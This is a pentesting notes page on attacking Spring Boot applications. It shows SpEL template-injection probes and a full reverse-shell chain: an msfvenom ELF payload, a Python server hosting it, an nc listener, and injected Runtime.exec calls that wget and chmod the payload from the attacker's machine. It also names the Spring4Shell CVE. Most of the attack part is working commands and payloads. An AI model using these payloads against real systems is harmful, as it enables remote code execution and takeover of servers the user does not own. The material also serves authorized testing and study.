Exploit Notes

Spring Pentesting

Last modified: 2023-01-23

Reverse Shell SSTI Web

Spring is an application framework and inversion of control container for the Java platform.


  • If we get the Whitelabel Error Page, the website uses Spring Boot.

Reverse Shell with SSTI

SSTI Discovery

If there is an input form, such as a search form, or URL parameter which the parameter is reflected in the website, you may be able to find the vulnerability to the server-side template injection.

Try them:


Then you can also check more about that.

{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}

// ---------------------------------------

// the desired output of the above...

Reverse Shell

First generate the payload of the reverse shell which will be downloaded from the website.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf

Start a local web server to allow the website to download the payload named “r.elf”

python3 -m http.server 8000

In another terminal, open listener for getting the reverse shell.

nc -lvnp <local-port>

In the target website,

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}


Finally we should see to get the shell.

Spring4Shell (CVE-2022-22965)

Spring4Shell is a vulnerabilitiy to remote code execution in the Spring Framework. It affects a component in Spring Core which is the heart of the framework.

It is identified as a bypass of the patch for CVE-2010-1622.


Vary exploits are available in GitHub repositories.

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.